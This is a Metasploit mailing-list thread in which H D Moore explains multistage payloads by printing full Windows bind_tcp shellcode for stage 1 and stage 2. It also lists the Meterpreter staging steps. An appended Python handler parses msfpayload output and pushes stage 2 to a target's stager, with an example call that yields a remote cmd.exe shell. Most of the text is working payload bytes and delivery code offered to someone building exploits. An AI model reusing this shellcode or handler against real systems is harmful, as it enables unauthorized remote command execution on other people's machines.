Metasploit mailing list archives

Building multistage payloaded exploits?


From: hdm at metasploit.com (H D Moore)
Date: Mon, 24 Sep 2007 16:36:36 -0500

The multistaged stuff isn't simple to implement outside of Metasploit. 
There are intermediate stages and in some cases (Meterpreter) entire 
client-side libraries that need to be used. 

If you want to use a "simple" stager (2 pieces), then msfpayload will 
generate the correct blocks for you. For example:

$ msfpayload windows/shell/bind_tcp LPORT=12345 C
/*
 * windows/shell/bind_tcp - 201 bytes (stage 1)
 * http://www.metasploit.com
 * EXITFUNC=seh, LPORT=12345
 */
unsigned char buf[] =
"\xfc\x6a\xeb\x47\xe8\xf9\xff\xff\xff\x60\x31\xdb\x8b\x7d\x3c"
"\x8b\x7c\x3d\x78\x01\xef\x8b\x57\x20\x01\xea\x8b\x34\x9a\x01"
"\xee\x31\xc0\x99\xac\xc1\xca\x0d\x01\xc2\x84\xc0\x75\xf6\x43"
"\x66\x39\xca\x75\xe3\x4b\x8b\x4f\x24\x01\xe9\x66\x8b\x1c\x59"
"\x8b\x4f\x1c\x01\xe9\x03\x2c\x99\x89\x6c\x24\x1c\x61\xff\xe0"
"\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68"
"\x08\x5e\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\x66"
"\xb9\x72\x60\xff\xd6\x95\x53\x53\x53\x53\x53\x43\x53\x43\x53"
"\x89\xe7\x66\x81\xef\x08\x02\x57\x53\x66\xb9\xe7\xdf\xff\xd6"
"\x66\xb9\xa8\x6f\xff\xd6\x97\x66\x68\x30\x39\x66\x53\x89\xe1"
"\x6a\x10\x51\x57\x66\xb9\x80\x3b\xff\xd6\x53\x57\x66\xb9\x75"
"\x49\xff\xd6\x54\x54\x54\x57\x66\xb9\x32\x4c\xff\xd6\x97\x50"
"\x66\xb9\x33\xce\xff\xd6\x89\xe1\x50\xb4\x0c\x50\x51\x57\x51"
"\x66\xb9\xc0\x38\xff\xe6";

/*
 * windows/shell/bind_tcp - 474 bytes (stage 2)
 * http://www.metasploit.com
 */
unsigned char buf[] =
"\x68\x33\x32\x00\x00\x68\x57\x53\x32\x5f\x57\xfc\xe8\x4c\x00"
"\x00\x00\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x7c\x05\x78\x01"
"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\xe3\x30\x49\x8b\x34\x8b"
"\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2"
"\xeb\xf4\x3b\x54\x24\x24\x75\xe3\x8b\x5f\x24\x01\xeb\x66\x8b"
"\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
"\xc2\x08\x00\x6a\x30\x59\x64\x8b\x31\x8b\x76\x0c\x8b\x76\x1c"
"\xad\x8b\x58\x08\x5e\x53\x68\x8e\x4e\x0e\xec\xff\xd6\x97\x53"
"\x56\x57\x8d\x44\x24\x10\x50\xff\xd7\x50\x50\x50\x68\xb6\x19"
"\x18\xe7\xff\xd6\x97\x68\xa4\x19\x70\xe9\xff\xd6\x95\x68\x08"
"\x92\xe2\xed\xff\xd6\x50\x57\x55\x83\xec\x10\x89\xe5\x89\xee"
"\x6a\x01\x6a\x00\x6a\x0c\x89\xe1\x6a\x00\x51\x56\xad\x56\x53"
"\x68\x80\x8f\x0c\x17\xff\x55\x20\x89\xc7\xff\xd0\x89\xe0\x6a"
"\x00\x50\x8d\x75\x08\x56\x8d\x75\x0c\x56\xff\xd7\x68\x43\x4d"
"\x44\x00\x89\xe2\x31\xc0\x8d\x7a\xac\x6a\x15\x59\xf3\xab\x83"
"\xec\x54\xc6\x42\xbc\x44\x66\xc7\x42\xe8\x01\x01\x8b\x75\x08"
"\x89\x72\xfc\x89\x72\xf8\x8b\x75\x04\x89\x72\xf4\x8d\x42\xbc"
"\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\x52\x51\x53\x68\x72"
"\xfe\xb3\x16\xff\x55\x20\xff\xd0\x31\xc0\xb4\x04\x96\x29\xf4"
"\x89\xe7\x6a\x64\x53\x68\xb0\x49\x2d\xdb\xff\x55\x20\xff\xd0"
"\x31\xc0\x50\x57\x50\x50\x50\xff\x75\x0c\x53\x68\x11\xc4\x07"
"\xb4\xff\x55\x20\xff\xd0\x85\xc0\x74\x74\x31\xc0\x3b\x07\x74"
"\x36\xe8\x77\x00\x00\x00\x50\x89\xe1\x50\x51\x56\x57\xff\x75"
"\x0c\x53\x68\x16\x65\xfa\x10\xff\x55\x20\xff\xd0\x85\xc0\x74"
"\x50\x31\xc0\x59\x39\xc8\x74\x11\x50\x51\x57\xff\x75\x28\xff"
"\x55\x10\x31\xc9\x39\xc8\x7c\x3a\xeb\xab\x89\xe0\xe8\x3f\x00"
"\x00\x00\x31\xc0\x50\x56\x57\xff\x75\x28\xff\x55\x14\x31\xc9"
"\x39\xc8\x7c\x86\x74\x1e\x51\x89\xe2\x51\x52\x50\x57\xff\x75"
"\x00\x53\x68\x1f\x79\x0a\xe8\xff\x55\x20\xff\xd0\x85\xc0\x74"
"\x05\x31\xc0\x59\xeb\xc8\x53\x68\xf0\x8a\x04\x5f\xff\x55\x20"
"\x31\xc9\x51\xff\xd0\x50\x54\x68\x7e\x66\x04\x80\xff\x75\x28"
"\xff\x55\x18\x85\xc0\x58\x75\xe0\xc3";

If you want to use VNCInject or Meterpreter, it looks like:

1) Send the basic stager (same as stage 1 above)
2) Send the intermediate stager (89 bytes)
3) Send the DLLInject stager (~2800 bytes)
4) Send the DLL itself (150k~+ bytes)
5) Talk to the payload socket and handle the DLL
6) Handle VNC or Meterpreter protocols

Use something like Wireshark to match up the exploit output (sending 
stage...) with the network traffic. If it was trivial, we would not have 
needed all this Ruby code to do it ;-)

-HD


On Monday 24 September 2007 16:12, scotty to hotty wrote:
Well, since you're on, I was wondering if you can point me to an exploit
with multistaged payloads? I need to learn how to do it in multiple
stages instead of single.... I would like to find out how to do a
multistage instead of single; heck, I even tried finding out how using
Paterva Maltego and it couldn't find anything I didn't already know....

and

On Saturday 22 September 2007 20:34, scotty to hotty wrote:
Can anyone help me out on how I could add some multistaged payload to
my exploit? I only know how to use single-stage shellcodes.... Any help
will be appreciated.
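The handler side of both exchanges HD describes, as an added example that is not from the post or from Metasploit itself. Two things in it are my own reading or assumption rather than statements the post makes: the stage-1 bytes printed above end in a single recv(s, esp, 0xC00, 0) whose pushed return address is the buffer itself (the "\xb4\x0c" / "\x51" / "\xff\xe6" tail), so stage 2 has to arrive in one read of at most 3072 bytes; and the large-stage path is framed here as a 4-byte little-endian length followed by the blob, which is a generic length-prefixed framing and not necessarily the exact wire format of the 89-byte intermediate stager. The msfpayload text embedded below is a constructed short sample in the same layout as the real output, and the "target" functions are simulations of what the stager does so the exchange can be run offline over a socketpair.

```python
"""Handler side of a Metasploit-style staged payload (added example).

* 2-piece bind_tcp: stage 1 listens on LPORT, accept()s, then does ONE
  recv() of at most 0xC00 bytes into a stack buffer and returns into it.
* Large stage (VNC/Meterpreter DLL): does not fit that window, so it is
  sent as <u32 LE length><blob> for a stager that allocates and loops.
"""
import re
import socket
import struct
import threading

# Size of the single recv() in the stage-1 bytes ("\xb4\x0c" = mov ah,0x0c
# -> len 0xC00).  My disassembly of the printed stager, not a figure the
# post states.
STAGER_RECV_WINDOW = 0xC00

# One `msfpayload ... C` block: the size/stage comment, then the array.
_BLOCK_RE = re.compile(
    r'/\*\s*\*\s*(?P<name>\S+)\s*-\s*(?P<size>\d+)\s+bytes\s*'
    r'\(stage\s*(?P<n>\d+)\).*?unsigned char \w+\[\]\s*=\s*'
    r'(?P<body>(?:\s*"[^"]*")+)\s*;',
    re.S,
)

# Constructed sample in the exact layout msfpayload prints; the real
# stages on the page are 201 and 474 bytes, these are short dummies.
SAMPLE_MSFPAYLOAD_C = r'''
/*
 * windows/shell/bind_tcp - 6 bytes (stage 1)
 * http://www.metasploit.com
 * EXITFUNC=seh, LPORT=12345
 */
unsigned char buf[] =
"\xfc\x6a\xeb\x47"
"\xe8\xf9";

/*
 * windows/shell/bind_tcp - 5 bytes (stage 2)
 * http://www.metasploit.com
 */
unsigned char buf[] =
"\x68\x33\x32\x00\x00";
'''


def parse_msfpayload_c(text):
    """Return {stage_no: (name, bytes)}.  msfpayload names both arrays
    `buf`, so the stage number in the comment is what tells them apart."""
    stages = {}
    for m in _BLOCK_RE.finditer(text):
        hexstr = "".join(re.findall(r'"([^"]*)"', m.group("body")))
        blob = bytes.fromhex(hexstr.replace("\\x", ""))
        if len(blob) != int(m.group("size")):
            raise ValueError("%s: literal has %d bytes, comment says %s"
                             % (m.group("name"), len(blob), m.group("size")))
        stages[int(m.group("n"))] = (m.group("name"), blob)
    return stages


def send_single_recv_stage(sock, stage, window=STAGER_RECV_WINDOW):
    """Push a stage to a stager that does one recv() into a fixed buffer
    and returns into it.  Bytes past the window would be left unread while
    a truncated stage executes, so refuse before sending anything."""
    if len(stage) > window:
        raise ValueError("stage is %d bytes; stager reads at most %d"
                         % (len(stage), window))
    sock.sendall(stage)
    return len(stage)


def send_length_prefixed_stage(sock, stage):
    """Push a large stage as <u32 LE length><blob> so a length-aware
    intermediate stager can allocate once and recv() in a loop.  Assumed
    framing; the post does not show the midstager's wire format."""
    frame = struct.pack("<I", len(stage)) + stage
    sock.sendall(frame)
    return len(frame)


def stage_bind_tcp(host, port, stage2):
    """Connect to stage 1 bound on host:port, push stage 2, return the
    socket that now talks to the running stage (the shell)."""
    sock = socket.create_connection((host, port))
    send_single_recv_stage(sock, stage2)
    return sock


# --- target side, simulated so the exchange can be exercised offline ----

def stager_single_recv(sock, window=STAGER_RECV_WINDOW):
    """What stage 1 does after accept(): a single recv(s, esp, 0xC00, 0)."""
    return sock.recv(window)


def _recv_exact(sock, n):
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(min(65536, n - len(buf)))
        if not chunk:
            raise ConnectionError("peer closed at %d of %d bytes" % (len(buf), n))
        buf += chunk
    return bytes(buf)


def stager_length_prefixed(sock):
    """What a length-aware intermediate stager does: read the length,
    allocate, keep reading until the whole blob is in memory."""
    (n,) = struct.unpack("<I", _recv_exact(sock, 4))
    return _recv_exact(sock, n)


def run_exchange(handler, stager):
    """Run handler(sock) against stager(sock) over a socketpair and return
    what the simulated stager ended up holding in memory."""
    h_end, t_end = socket.socketpair()
    got = {}
    t = threading.Thread(target=lambda: got.update(stage=stager(t_end)))
    t.start()
    try:
        handler(h_end)
    finally:
        h_end.close()
        t.join()
        t_end.close()
    return got["stage"]
```

Against a real target the call is `stage_bind_tcp("10.0.0.5", 12345, parse_msfpayload_c(text)[2][1])` and the returned socket is the cmd.exe session; the simulated pair is what you compare against a Wireshark capture of the exploit's "Sending stage..." output, and it also shows why a ~150k DLL cannot go down the 0xC00 window of the printed stager without the extra hops in HD's list.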